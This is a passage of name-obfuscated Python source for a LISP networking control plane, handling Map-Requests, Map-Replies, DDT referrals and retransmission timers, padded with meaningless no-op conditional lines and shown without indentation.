if 18 - 18: i1IIi
if 42 - 42: II111iiii - i1IIi . oO0o % OOooOOo % ooOoO0o - i11iIiiIii
if 23 - 23: OOooOOo + iIii1I11I1II1 - i1IIi
if 72 - 72: OOooOOo . I1IiiI * O0 + i11iIiiIii - iII111i
if 79 - 79: o0oOOo0O0Ooo + I1ii11iIi11i
if 46 - 46: I11i
if 78 - 78: IiII / II111iiii
def lisp_ms_send_map_referral ( lisp_sockets , map_request , ecm_source , port ,
action , eid_prefix , group_prefix ) :
if 55 - 55: Oo0Ooo
OOo0O0O0o0 = map_request . target_eid
O0o00oOOOO00 = map_request . target_group
oOO000 = map_request . nonce
if 80 - 80: o0oOOo0O0Ooo - I1Ii111 * O0 * iIii1I11I1II1
if ( action == LISP_DDT_ACTION_MS_ACK ) : oo0o = 1440
if 59 - 59: I1ii11iIi11i + I11i / OoO0O00
if 36 - 36: o0oOOo0O0Ooo + ooOoO0o * I11i
if 81 - 81: OOooOOo * I11i - I1ii11iIi11i
if 82 - 82: I1ii11iIi11i * II111iiii - OoooooooOO % iII111i * I1IiiI % OoOoOO00
O0OOoOoOO = lisp_map_referral ( )
O0OOoOoOO . record_count = 1
O0OOoOoOO . nonce = oOO000
IIii1i = O0OOoOoOO . encode ( )
O0OOoOoOO . print_map_referral ( )
if 81 - 81: I11i + o0oOOo0O0Ooo / iII111i
IiiIIiIi1i11i = False
if 35 - 35: ooOoO0o % I11i * I1ii11iIi11i
if 10 - 10: OoO0O00 + OoooooooOO + I1Ii111
if 57 - 57: Ii1I % Ii1I * Oo0Ooo % i11iIiiIii
if 12 - 12: oO0o . Oo0Ooo . I1IiiI - i11iIiiIii / o0oOOo0O0Ooo
if 54 - 54: i11iIiiIii + I1Ii111 . I1Ii111 * I1ii11iIi11i % I1Ii111 - OoooooooOO
if 76 - 76: IiII + i1IIi + i11iIiiIii . oO0o
if ( action == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
eid_prefix , group_prefix , action = lisp_ms_compute_neg_prefix ( OOo0O0O0o0 ,
O0o00oOOOO00 )
oo0o = 15
if 23 - 23: ooOoO0o - OoO0O00 + oO0o . OOooOOo - I1IiiI
if ( action == LISP_DDT_ACTION_MS_NOT_REG ) : oo0o = 1
if ( action == LISP_DDT_ACTION_MS_ACK ) : oo0o = 1440
if ( action == LISP_DDT_ACTION_DELEGATION_HOLE ) : oo0o = 15
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : oo0o = 0
if 66 - 66: iII111i % iII111i
oooO0oOOOO0 = False
OOO0Oo0o = 0
oo0ooo = lisp_ddt_cache_lookup ( OOo0O0O0o0 , O0o00oOOOO00 , False )
if ( oo0ooo != None ) :
OOO0Oo0o = len ( oo0ooo . delegation_set )
oooO0oOOOO0 = oo0ooo . is_ms_peer_entry ( )
oo0ooo . map_referrals_sent += 1
if 25 - 25: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoooooooOO . i1IIi
if 10 - 10: OoO0O00 % iIii1I11I1II1 * OoOoOO00 / i11iIiiIii - I1IiiI . O0
if 2 - 2: II111iiii
if 13 - 13: Ii1I % i11iIiiIii
if 3 - 3: ooOoO0o % OoOoOO00 * I1Ii111 - OoO0O00 / i1IIi % I1IiiI
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : IiiIIiIi1i11i = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
IiiIIiIi1i11i = ( oooO0oOOOO0 == False )
if 50 - 50: I1ii11iIi11i + iII111i
if 64 - 64: oO0o
if 11 - 11: o0oOOo0O0Ooo
if 95 - 95: i1IIi . ooOoO0o . Oo0Ooo
if 13 - 13: OOooOOo - Oo0Ooo % O0 . I1Ii111
iiI = lisp_eid_record ( )
iiI . rloc_count = OOO0Oo0o
iiI . authoritative = True
iiI . action = action
iiI . ddt_incomplete = IiiIIiIi1i11i
iiI . eid = eid_prefix
iiI . group = group_prefix
iiI . record_ttl = oo0o
if 66 - 66: I1IiiI + I11i
IIii1i += iiI . encode ( )
iiI . print_record ( " " , True )
if 58 - 58: I1ii11iIi11i
if 7 - 7: oO0o - I11i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / OoO0O00 + IiII + i11iIiiIii
if 64 - 64: o0oOOo0O0Ooo * IiII * IiII * iII111i % i11iIiiIii
if ( OOO0Oo0o != 0 ) :
for ii1iII11 in oo0ooo . delegation_set :
iIii1IiIiI = lisp_rloc_record ( )
iIii1IiIiI . rloc = ii1iII11 . delegate_address
iIii1IiIiI . priority = ii1iII11 . priority
iIii1IiIiI . weight = ii1iII11 . weight
iIii1IiIiI . mpriority = 255
iIii1IiIiI . mweight = 0
iIii1IiIiI . reach_bit = True
IIii1i += iIii1IiIiI . encode ( )
iIii1IiIiI . print_record ( " " )
if 22 - 22: I1ii11iIi11i * II111iiii - OOooOOo % i11iIiiIii
if 10 - 10: OOooOOo / I1ii11iIi11i
if 21 - 21: OoO0O00 % Oo0Ooo . o0oOOo0O0Ooo + IiII
if 48 - 48: O0 / i1IIi / iII111i
if 11 - 11: O0 - OoO0O00 + OoOoOO00 * ooOoO0o - Ii1I
if 82 - 82: Ii1I - O0 * ooOoO0o . ooOoO0o
if 32 - 32: o0oOOo0O0Ooo . OoooooooOO % OOooOOo
if ( map_request . nonce != 0 ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , IIii1i , ecm_source , port )
return
if 2 - 2: OoOoOO00 + I1ii11iIi11i + oO0o
if 27 - 27: OoooooooOO - Ii1I / OoooooooOO + OoO0O00
if 58 - 58: OOooOOo * I11i . I1IiiI
if 46 - 46: I11i + II111iiii * iII111i % ooOoO0o - I1IiiI
if 73 - 73: I1ii11iIi11i * iIii1I11I1II1 . I1Ii111 - Ii1I
if 11 - 11: I11i
if 48 - 48: IiII / O0
if 46 - 46: ooOoO0o + oO0o
def lisp_send_negative_map_reply ( sockets , eid , group , nonce , dest , port , ttl ,
xtr_id , pubsub ) :
if 7 - 7: ooOoO0o * oO0o . i1IIi
lprint ( "Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}" . format ( lisp_print_eid_tuple ( eid , group ) , lisp_hex_string ( nonce ) ,
# IiII * OoO0O00 / OoooooooOO % o0oOOo0O0Ooo + OoO0O00
red ( dest . print_address ( ) , False ) ) )
if 25 - 25: IiII % OOooOOo + Ii1I * I1ii11iIi11i
OOo000 = LISP_NATIVE_FORWARD_ACTION if group . is_null ( ) else LISP_DROP_ACTION
if 25 - 25: iIii1I11I1II1 * OoOoOO00 % I1IiiI + IiII
if 34 - 34: ooOoO0o - OoooooooOO . o0oOOo0O0Ooo
if 83 - 83: II111iiii . OOooOOo
if 88 - 88: O0
if 12 - 12: Ii1I % OOooOOo % Oo0Ooo * I1Ii111
if ( lisp_get_eid_hash ( eid ) != None ) :
OOo000 = LISP_SEND_MAP_REQUEST_ACTION
if 96 - 96: iII111i + ooOoO0o
if 100 - 100: OOooOOo . ooOoO0o + Ii1I + Ii1I
IIii1i = lisp_build_map_reply ( eid , group , [ ] , nonce , OOo000 , ttl , False ,
None , False , False )
if 70 - 70: ooOoO0o . iIii1I11I1II1 / oO0o
if 18 - 18: Ii1I / OoooooooOO % i1IIi * o0oOOo0O0Ooo
if 70 - 70: IiII % i1IIi / IiII - o0oOOo0O0Ooo . Oo0Ooo / O0
if 54 - 54: o0oOOo0O0Ooo
if ( pubsub ) :
lisp_process_pubsub ( sockets , IIii1i , eid , dest , port , nonce , ttl ,
xtr_id )
else :
lisp_send_map_reply ( sockets , IIii1i , dest , port )
if 53 - 53: II111iiii / IiII . i1IIi + I1Ii111 / OoO0O00 - OoooooooOO
return
if 67 - 67: ooOoO0o . Ii1I - Oo0Ooo * iII111i . I11i - OOooOOo
if 10 - 10: I11i
if 37 - 37: o0oOOo0O0Ooo / I1IiiI * oO0o / II111iiii
if 39 - 39: IiII - i1IIi - IiII - OoooooooOO - I1ii11iIi11i
if 66 - 66: IiII + i1IIi
if 21 - 21: IiII / i11iIiiIii / OoOoOO00
if 75 - 75: Ii1I . i1IIi / I1IiiI * iII111i . IiII / OoOoOO00
def lisp_retransmit_ddt_map_request ( mr ) :
O0oOo0o = mr . mr_source . print_address ( )
ooO0O00OOoo0O = mr . print_eid_tuple ( )
oOO000 = mr . nonce
if 34 - 34: ooOoO0o * IiII . Ii1I + iIii1I11I1II1
if 1 - 1: i11iIiiIii + I11i
if 78 - 78: Ii1I % Oo0Ooo / OoO0O00 . iIii1I11I1II1 . II111iiii
if 67 - 67: oO0o % I1Ii111
if 72 - 72: I1IiiI . i11iIiiIii . OoOoOO00 + I1IiiI - I1Ii111 + iII111i
if ( mr . last_request_sent_to ) :
i11i11 = mr . last_request_sent_to . print_address ( )
o0ooo000OO = lisp_referral_cache_lookup ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] , True )
if ( o0ooo000OO and o0ooo000OO . referral_set . has_key ( i11i11 ) ) :
o0ooo000OO . referral_set [ i11i11 ] . no_responses += 1
if 17 - 17: I1IiiI . i11iIiiIii * OoO0O00 + II111iiii
if 34 - 34: Ii1I - O0 + Ii1I + I11i + I1ii11iIi11i . Ii1I
if 56 - 56: Ii1I
if 58 - 58: iII111i
if 18 - 18: O0 * OoooooooOO % IiII - iIii1I11I1II1 % IiII * o0oOOo0O0Ooo
if 13 - 13: OoO0O00 + i11iIiiIii + O0 / ooOoO0o % iIii1I11I1II1
if 75 - 75: oO0o / i1IIi / Ii1I * Oo0Ooo
if ( mr . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "DDT Map-Request retry limit reached for EID {}, nonce 0x{}" . format ( green ( ooO0O00OOoo0O , False ) , lisp_hex_string ( oOO000 ) ) )
if 75 - 75: Oo0Ooo / OoooooooOO
mr . dequeue_map_request ( )
return
if 98 - 98: II111iiii - I1Ii111 . ooOoO0o * iII111i
if 49 - 49: I1ii11iIi11i / OoooooooOO - I11i
mr . retry_count += 1
if 76 - 76: i1IIi . OoO0O00 . O0 / OOooOOo - iII111i
IiII1iiI = green ( O0oOo0o , False )
OooOOOoOoo0O0 = green ( ooO0O00OOoo0O , False )
lprint ( "Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( bold ( "Map-Request" , False ) , "P" if mr . from_pitr else "" ,
# I1IiiI . ooOoO0o . II111iiii % OOooOOo
red ( mr . itr . print_address ( ) , False ) , IiII1iiI , OooOOOoOoo0O0 ,
lisp_hex_string ( oOO000 ) ) )
if 86 - 86: i11iIiiIii + I1ii11iIi11i / OoOoOO00 * OoooooooOO
if 6 - 6: II111iiii
if 26 - 26: iIii1I11I1II1 / iIii1I11I1II1 . IiII * i11iIiiIii
if 21 - 21: OOooOOo + o0oOOo0O0Ooo
lisp_send_ddt_map_request ( mr , False )
if 28 - 28: OOooOOo + i1IIi + II111iiii / Oo0Ooo + iIii1I11I1II1 . Oo0Ooo
if 73 - 73: Ii1I * iIii1I11I1II1 / o0oOOo0O0Ooo - o0oOOo0O0Ooo / i1IIi
if 64 - 64: Ii1I * I1ii11iIi11i % II111iiii
if 31 - 31: iIii1I11I1II1 % Oo0Ooo . I1IiiI % ooOoO0o
mr . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ mr ] )
mr . retransmit_timer . start ( )
return
if 38 - 38: I1ii11iIi11i + I1Ii111 * I11i / OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: iII111i
if 56 - 56: Oo0Ooo / II111iiii
if 61 - 61: Ii1I - i1IIi / ooOoO0o - Oo0Ooo / IiII % Oo0Ooo
if 53 - 53: OoooooooOO + iII111i % II111iiii * IiII
if 10 - 10: OoOoOO00 % I11i
if 46 - 46: i1IIi % IiII
if 45 - 45: I1ii11iIi11i / I1ii11iIi11i - OoO0O00
def lisp_get_referral_node ( referral , source_eid , dest_eid ) :
if 54 - 54: Ii1I + I1IiiI * OoOoOO00 + oO0o
if 10 - 10: Ii1I - I1IiiI / IiII / iII111i - I1Ii111 - o0oOOo0O0Ooo
if 75 - 75: OOooOOo . ooOoO0o
if 32 - 32: i1IIi / I11i + iIii1I11I1II1 . OOooOOo
O00O0OOOo = [ ]
for ii in referral . referral_set . values ( ) :
if ( ii . updown == False ) : continue
if ( len ( O00O0OOOo ) == 0 or O00O0OOOo [ 0 ] . priority == ii . priority ) :
O00O0OOOo . append ( ii )
elif ( O00O0OOOo [ 0 ] . priority > ii . priority ) :
O00O0OOOo = [ ]
O00O0OOOo . append ( ii )
if 54 - 54: I1Ii111 * OoO0O00
if 94 - 94: iIii1I11I1II1
if 33 - 33: iII111i . iIii1I11I1II1 - Ii1I
oOOOOOo = len ( O00O0OOOo )
if ( oOOOOOo == 0 ) : return ( None )
if 96 - 96: OoO0O00 - II111iiii - I1IiiI % ooOoO0o
I1I = dest_eid . hash_address ( source_eid )
I1I = I1I % oOOOOOo
return ( O00O0OOOo [ I1I ] )
if 78 - 78: I11i / Ii1I . IiII / o0oOOo0O0Ooo / OoO0O00 + OoOoOO00
if 50 - 50: Ii1I
if 84 - 84: iII111i % II111iiii
if 31 - 31: I11i
if 28 - 28: i11iIiiIii + IiII / I11i . Ii1I / OoO0O00
if 100 - 100: o0oOOo0O0Ooo - I11i . o0oOOo0O0Ooo
if 90 - 90: OoOoOO00 / II111iiii / I11i * I11i - iIii1I11I1II1
def lisp_send_ddt_map_request ( mr , send_to_root ) :
o0OoOO00O0O0 = mr . lisp_sockets
oOO000 = mr . nonce
III1iii1 = mr . itr
O0o0000o00oOO = mr . mr_source
I11i11i1 = mr . print_eid_tuple ( )
if 80 - 80: iIii1I11I1II1 + I11i / oO0o . I1Ii111 + I11i
if 26 - 26: Oo0Ooo . i11iIiiIii % I1Ii111 . Oo0Ooo + Oo0Ooo + OoOoOO00
if 100 - 100: IiII * I11i - OOooOOo
if 11 - 11: I1IiiI % Ii1I + II111iiii
if 100 - 100: oO0o - II111iiii . o0oOOo0O0Ooo
if ( mr . send_count == 8 ) :
lprint ( "Giving up on map-request-queue entry {}, nonce 0x{}" . format ( green ( I11i11i1 , False ) , lisp_hex_string ( oOO000 ) ) )
if 63 - 63: OoOoOO00 % IiII . iII111i
mr . dequeue_map_request ( )
return
if 44 - 44: I1IiiI
if 25 - 25: oO0o
if 100 - 100: I1IiiI / IiII + OoO0O00 . iII111i
if 39 - 39: OoooooooOO * OOooOOo - OoO0O00
if 3 - 3: I11i . i11iIiiIii % Oo0Ooo % II111iiii . I11i
if 88 - 88: iIii1I11I1II1 . OOooOOo % iII111i
if ( send_to_root ) :
o0oooOo = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OOOooo000O = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
mr . tried_root = True
lprint ( "Jumping up to root for EID {}" . format ( green ( I11i11i1 , False ) ) )
else :
o0oooOo = mr . eid
OOOooo000O = mr . group
if 67 - 67: i1IIi * i11iIiiIii * I1IiiI
if 23 - 23: Oo0Ooo
if 81 - 81: I1Ii111 % II111iiii - Oo0Ooo / I1IiiI + i11iIiiIii . I11i
if 67 - 67: ooOoO0o . I1Ii111 . Oo0Ooo . Ii1I + iIii1I11I1II1 / OoooooooOO
if 93 - 93: ooOoO0o * OoO0O00 - I1Ii111 / I1ii11iIi11i
OOoO = lisp_referral_cache_lookup ( o0oooOo , OOOooo000O , False )
if ( OOoO == None ) :
lprint ( "No referral cache entry found" )
lisp_send_negative_map_reply ( o0OoOO00O0O0 , o0oooOo , OOOooo000O ,
oOO000 , III1iii1 , mr . sport , 15 , None , False )
return
if 34 - 34: OoOoOO00 + I1ii11iIi11i % Ii1I
if 70 - 70: i1IIi * II111iiii * I1IiiI
Ii1i1Ii = OOoO . print_eid_tuple ( )
lprint ( "Found referral cache entry {}, referral-type: {}" . format ( Ii1i1Ii ,
OOoO . print_referral_type ( ) ) )
if 7 - 7: OoooooooOO + II111iiii / Oo0Ooo % O0 % OOooOOo . I1Ii111
ii = lisp_get_referral_node ( OOoO , O0o0000o00oOO , mr . eid )
if ( ii == None ) :
lprint ( "No reachable referral-nodes found" )
mr . dequeue_map_request ( )
lisp_send_negative_map_reply ( o0OoOO00O0O0 , OOoO . eid ,
OOoO . group , oOO000 , III1iii1 , mr . sport , 1 , None , False )
return
if 78 - 78: iIii1I11I1II1 % OOooOOo
if 27 - 27: I11i + ooOoO0o - II111iiii . OoooooooOO % O0 % I1ii11iIi11i
lprint ( "Send DDT Map-Request to {} {} for EID {}, nonce 0x{}" . format ( ii . referral_address . print_address ( ) ,
# I1ii11iIi11i % IiII
OOoO . print_referral_type ( ) , green ( I11i11i1 , False ) ,
lisp_hex_string ( oOO000 ) ) )
if 66 - 66: I1Ii111 % I1ii11iIi11i
if 77 - 77: I11i % iIii1I11I1II1 . iIii1I11I1II1 + oO0o % i11iIiiIii . IiII
if 33 - 33: IiII - OOooOOo / i11iIiiIii * iIii1I11I1II1
if 2 - 2: i11iIiiIii % ooOoO0o
O0O00OO0O0 = ( OOoO . referral_type == LISP_DDT_ACTION_MS_REFERRAL or
OOoO . referral_type == LISP_DDT_ACTION_MS_ACK )
lisp_send_ecm ( o0OoOO00O0O0 , mr . packet , O0o0000o00oOO , mr . sport , mr . eid ,
ii . referral_address , to_ms = O0O00OO0O0 , ddt = True )
if 60 - 60: OoooooooOO
if 11 - 11: OoO0O00 . OoO0O00
if 31 - 31: iIii1I11I1II1
if 64 - 64: ooOoO0o
mr . last_request_sent_to = ii . referral_address
mr . last_sent = lisp_get_timestamp ( )
mr . send_count += 1
ii . map_requests_sent += 1
return
if 30 - 30: OoO0O00 + o0oOOo0O0Ooo / iIii1I11I1II1
if 69 - 69: IiII - OoooooooOO + iII111i + iII111i - Ii1I
if 27 - 27: I1ii11iIi11i % Oo0Ooo * iIii1I11I1II1 * O0 / I11i * Oo0Ooo
if 97 - 97: IiII % Oo0Ooo % OoOoOO00
if 87 - 87: i11iIiiIii . oO0o * I1IiiI * I1Ii111
if 57 - 57: iIii1I11I1II1 / i11iIiiIii / IiII + I1ii11iIi11i % I1IiiI
if 80 - 80: iIii1I11I1II1
if 23 - 23: II111iiii . ooOoO0o % I1Ii111
def lisp_mr_process_map_request ( lisp_sockets , packet , map_request , ecm_source ,
sport , mr_source ) :
if 39 - 39: OoooooooOO
OOo0O0O0o0 = map_request . target_eid
O0o00oOOOO00 = map_request . target_group
ooO0O00OOoo0O = map_request . print_eid_tuple ( )
O0oOo0o = mr_source . print_address ( )
oOO000 = map_request . nonce
if 10 - 10: Oo0Ooo * iII111i
IiII1iiI = green ( O0oOo0o , False )
OooOOOoOoo0O0 = green ( ooO0O00OOoo0O , False )
lprint ( "Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( "P" if map_request . pitr_bit else "" ,
# I1IiiI + o0oOOo0O0Ooo + I1IiiI . I1ii11iIi11i - I1IiiI
red ( ecm_source . print_address ( ) , False ) , IiII1iiI , OooOOOoOoo0O0 ,
lisp_hex_string ( oOO000 ) ) )
if 97 - 97: oO0o + iII111i * OoOoOO00 % o0oOOo0O0Ooo
if 57 - 57: OoooooooOO . Oo0Ooo + OoooooooOO + I1Ii111 + iIii1I11I1II1 + OoOoOO00
if 69 - 69: OoO0O00
if 24 - 24: i1IIi + o0oOOo0O0Ooo / oO0o - I1IiiI % I1IiiI
O0o00000o0O = lisp_ddt_map_request ( lisp_sockets , packet , OOo0O0O0o0 , O0o00oOOOO00 , oOO000 )
O0o00000o0O . packet = packet
O0o00000o0O . itr = ecm_source
O0o00000o0O . mr_source = mr_source
O0o00000o0O . sport = sport
O0o00000o0O . from_pitr = map_request . pitr_bit
O0o00000o0O . queue_map_request ( )
if 68 - 68: iIii1I11I1II1
lisp_send_ddt_map_request ( O0o00000o0O , False )
return
if 30 - 30: I11i . I1ii11iIi11i - i1IIi / i1IIi + IiII . oO0o
if 70 - 70: i1IIi . I11i * o0oOOo0O0Ooo . iII111i
if 75 - 75: oO0o * OoO0O00 * I11i + oO0o + O0 . I1Ii111
if 8 - 8: I1ii11iIi11i / i1IIi - I1ii11iIi11i + Ii1I + OoO0O00 - I11i
if 79 - 79: OoooooooOO - I1Ii111 * I1IiiI . I1Ii111 - iIii1I11I1II1
if 27 - 27: OoOoOO00 % OoOoOO00 % II111iiii
if 45 - 45: iIii1I11I1II1 . o0oOOo0O0Ooo % I1IiiI
def lisp_process_map_request ( lisp_sockets , packet , ecm_source , ecm_port ,
mr_source , mr_port , ddt_request , ttl ) :
if 10 - 10: I1IiiI / i1IIi * o0oOOo0O0Ooo + Oo0Ooo - OoOoOO00 % iII111i
OO0o0 = packet
o00oo00OOOO = lisp_map_request ( )
packet = o00oo00OOOO . decode ( packet , mr_source , mr_port )
if ( packet == None ) :
lprint ( "Could not decode Map-Request packet" )
return
if 60 - 60: IiII + ooOoO0o - iII111i
if 69 - 69: iIii1I11I1II1 + oO0o
o00oo00OOOO . print_map_request ( )
if 16 - 16: OoO0O00 / I11i * OoOoOO00 % OoO0O00 * oO0o * o0oOOo0O0Ooo
if 80 - 80: o0oOOo0O0Ooo % I11i + O0 % i1IIi
if 58 - 58: oO0o / I1ii11iIi11i * O0 % I11i
if 34 - 34: oO0o / O0 * oO0o
if ( o00oo00OOOO . rloc_probe ) :
lisp_process_rloc_probe_request ( lisp_sockets , o00oo00OOOO ,
mr_source , mr_port , ttl )
return
if 47 - 47: iIii1I11I1II1 - o0oOOo0O0Ooo % Ii1I
if 38 - 38: ooOoO0o / IiII * I1ii11iIi11i % I1ii11iIi11i % oO0o
if 82 - 82: I1ii11iIi11i . i11iIiiIii - I11i . iII111i / OOooOOo
if 60 - 60: I1IiiI / I1IiiI / II111iiii
if 59 - 59: OOooOOo . oO0o + ooOoO0o % o0oOOo0O0Ooo . i11iIiiIii
if ( o00oo00OOOO . smr_bit ) :
lisp_process_smr ( o00oo00OOOO )
if 27 - 27: OoOoOO00 - OoooooooOO / IiII / II111iiii * OOooOOo * ooOoO0o
if 43 - 43: II111iiii . IiII - I1IiiI * I1ii11iIi11i + OoooooooOO
if 34 - 34: I1Ii111 / i1IIi
if 95 - 95: OoOoOO00 * OOooOOo
if 68 - 68: I1Ii111 / iIii1I11I1II1 % Ii1I
if ( o00oo00OOOO . smr_invoked_bit ) :
lisp_process_smr_invoked_request ( o00oo00OOOO )
if 77 - 77: i11iIiiIii + i11iIiiIii - I1ii11iIi11i % I1ii11iIi11i
if 26 - 26: oO0o + OoooooooOO % o0oOOo0O0Ooo
if 96 - 96: ooOoO0o * OoOoOO00 - II111iiii
if 40 - 40: oO0o * OOooOOo + Ii1I + I11i * Ii1I + OoooooooOO
if 77 - 77: OOooOOo + ooOoO0o / O0
if ( lisp_i_am_etr ) :
lisp_etr_process_map_request ( lisp_sockets , o00oo00OOOO , mr_source ,
mr_port , ttl )
if 16 - 16: ooOoO0o + Oo0Ooo * Oo0Ooo . I11i - IiII
if 49 - 49: ooOoO0o . Ii1I
if 75 - 75: OOooOOo / II111iiii - Oo0Ooo + I1Ii111
if 42 - 42: OoooooooOO * II111iiii + Ii1I % OoO0O00 / I1Ii111
if 11 - 11: ooOoO0o / Oo0Ooo + i1IIi / IiII
if ( lisp_i_am_ms ) :
packet = OO0o0
OOo0O0O0o0 , O0o00oOOOO00 , i1I1iiIii = lisp_ms_process_map_request ( lisp_sockets ,
OO0o0 , o00oo00OOOO , mr_source , mr_port , ecm_source )
if ( ddt_request ) :
lisp_ms_send_map_referral ( lisp_sockets , o00oo00OOOO , ecm_source ,
ecm_port , i1I1iiIii , OOo0O0O0o0 , O0o00oOOOO00 )
if 93 - 93: OOooOOo . O0 + IiII - iII111i * iII111i
return
if 6 - 6: iIii1I11I1II1 * i1IIi
if 66 - 66: OoooooooOO * I11i * ooOoO0o % oO0o - Oo0Ooo
if 17 - 17: Ii1I * I1ii11iIi11i - OoO0O00 - O0 + o0oOOo0O0Ooo + I1ii11iIi11i
if 78 - 78: OOooOOo * Oo0Ooo * Ii1I
if 94 - 94: OoooooooOO % iII111i
if ( lisp_i_am_mr and not ddt_request ) :
lisp_mr_process_map_request ( lisp_sockets , OO0o0 , o00oo00OOOO ,
ecm_source , mr_port , mr_source )
if 48 - 48: iIii1I11I1II1
if 25 - 25: i1IIi % o0oOOo0O0Ooo . iII111i / OoooooooOO + i1IIi
if 76 - 76: Oo0Ooo / OOooOOo + ooOoO0o % OoooooooOO - Oo0Ooo - I11i
if 36 - 36: OoO0O00 . Oo0Ooo * I1ii11iIi11i
if 16 - 16: IiII + OOooOOo
if ( lisp_i_am_ddt or ddt_request ) :
packet = OO0o0
lisp_ddt_process_map_request ( lisp_sockets , o00oo00OOOO , ecm_source ,
ecm_port )
if 33 - 33: ooOoO0o . i11iIiiIii + OOooOOo
return
if 77 - 77: OoooooooOO * Ii1I * iIii1I11I1II1 + IiII
if 53 - 53: IiII + I1Ii111 + oO0o
if 31 - 31: OOooOOo + OoOoOO00 * OOooOOo + OoOoOO00 / o0oOOo0O0Ooo . iIii1I11I1II1
if 1 - 1: I1Ii111 * i11iIiiIii % I1Ii111 - OoO0O00 + I1Ii111 / Oo0Ooo
if 3 - 3: OOooOOo - i11iIiiIii / I1Ii111 . OOooOOo - OoO0O00
if 60 - 60: OoOoOO00 / i1IIi . Ii1I - OoO0O00 - OoooooooOO
if 39 - 39: I1IiiI + i1IIi * OoO0O00 % I11i
if 41 - 41: I1ii11iIi11i * IiII
def lisp_store_mr_stats ( source , nonce ) :
O0o00000o0O = lisp_get_map_resolver ( source , None )
if ( O0o00000o0O == None ) : return
if 16 - 16: I1Ii111 % iIii1I11I1II1 / I1IiiI * OoOoOO00 / IiII / OoOoOO00
if 29 - 29: OoooooooOO / oO0o
if 1 - 1: OoOoOO00 . i11iIiiIii % I1Ii111 + OoooooooOO - Oo0Ooo . I1ii11iIi11i
if 46 - 46: i11iIiiIii + I11i - iIii1I11I1II1 / OoO0O00 - ooOoO0o / i1IIi
O0o00000o0O . neg_map_replies_received += 1
O0o00000o0O . last_reply = lisp_get_timestamp ( )
if 44 - 44: o0oOOo0O0Ooo + Oo0Ooo
if 46 - 46: OOooOOo % I1IiiI
if 66 - 66: iIii1I11I1II1 . o0oOOo0O0Ooo - ooOoO0o
if 27 - 27: Oo0Ooo - i1IIi * OoooooooOO - OoOoOO00 + OoOoOO00
if ( ( O0o00000o0O . neg_map_replies_received % 100 ) == 0 ) : O0o00000o0O . total_rtt = 0
if 24 - 24: i1IIi . OoOoOO00 / I1Ii111 + O0
if 86 - 86: Ii1I * OoOoOO00 % I1ii11iIi11i + OOooOOo
if 85 - 85: iII111i % i11iIiiIii
if 78 - 78: i11iIiiIii / I11i / Oo0Ooo + II111iiii - I1ii11iIi11i / I1ii11iIi11i
if ( O0o00000o0O . last_nonce == nonce ) :
O0o00000o0O . total_rtt += ( time . time ( ) - O0o00000o0O . last_used )
O0o00000o0O . last_nonce = 0
if 28 - 28: iIii1I11I1II1 / IiII - iIii1I11I1II1 . i1IIi - O0 * ooOoO0o
if ( ( O0o00000o0O . neg_map_replies_received % 10 ) == 0 ) : O0o00000o0O . last_nonce = 0
return
if 41 - 41: Ii1I + IiII
if 37 - 37: I1Ii111 / o0oOOo0O0Ooo - ooOoO0o - OoooooooOO . I1ii11iIi11i % I1Ii111
if 53 - 53: I1IiiI % OOooOOo + Ii1I - Ii1I
if 99 - 99: i1IIi * OoOoOO00 - i1IIi
if 65 - 65: OoO0O00 / i11iIiiIii + I1ii11iIi11i + OoOoOO00
if 82 - 82: Ii1I * OOooOOo % ooOoO0o / OoO0O00 - Oo0Ooo . I1Ii111
if 90 - 90: I11i * i11iIiiIii % i1IIi + I1Ii111 / OoO0O00
def lisp_process_map_reply ( lisp_sockets , packet , source , ttl ) :
global lisp_map_cache
if 15 - 15: Oo0Ooo + oO0o . I11i % OoO0O00
IiIIIi = lisp_map_reply ( )
packet = IiIIIi . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Reply packet" )
return
if 13 - 13: I1ii11iIi11i / ooOoO0o * I1Ii111
IiIIIi . print_map_reply ( )
if 45 - 45: I1ii11iIi11i - I11i
if 60 - 60: OOooOOo - OOooOOo * OoOoOO00 / Ii1I % iII111i % Oo0Ooo
if 75 - 75: iIii1I11I1II1 - IiII - I1Ii111
if 4 - 4: i11iIiiIii % OoooooooOO . i11iIiiIii
ooiIi1 = None
for IiIIi1IiiIiI in range ( IiIIIi . record_count ) :
iiI = lisp_eid_record ( )
packet = iiI . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Reply packet" )
return
if 49 - 49: i1IIi * iII111i - iIii1I11I1II1 % I11i * O0 / OoOoOO00
iiI . print_record ( " " , False )
if 48 - 48: IiII
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii - OOooOOo - o0oOOo0O0Ooo
if 98 - 98: o0oOOo0O0Ooo * OoO0O00 . OoooooooOO
if 40 - 40: I1Ii111 + Oo0Ooo + I1Ii111
if 57 - 57: I1Ii111 / II111iiii % iII111i
if ( iiI . rloc_count == 0 ) :
lisp_store_mr_stats ( source , IiIIIi . nonce )
if 32 - 32: IiII - OOooOOo + i11iIiiIii + I1IiiI . iII111i
if 75 - 75: o0oOOo0O0Ooo % o0oOOo0O0Ooo . I1IiiI / OoO0O00
iIIiI = ( iiI . group . is_null ( ) == False )
if 16 - 16: II111iiii . Ii1I + I1Ii111 % i1IIi / i11iIiiIii + OOooOOo
if 43 - 43: I1IiiI . Oo0Ooo + i1IIi + I11i / OoO0O00
if 66 - 66: i11iIiiIii
if 83 - 83: I1Ii111 / iIii1I11I1II1 - oO0o
